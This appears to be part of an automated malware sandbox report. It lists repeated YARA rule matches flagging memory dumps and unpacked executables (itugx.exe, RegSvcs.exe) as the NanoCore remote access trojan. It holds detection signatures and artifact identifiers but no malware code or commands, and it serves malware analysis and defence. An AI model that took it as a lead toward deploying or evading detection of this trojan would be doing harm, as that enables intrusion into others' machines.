      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
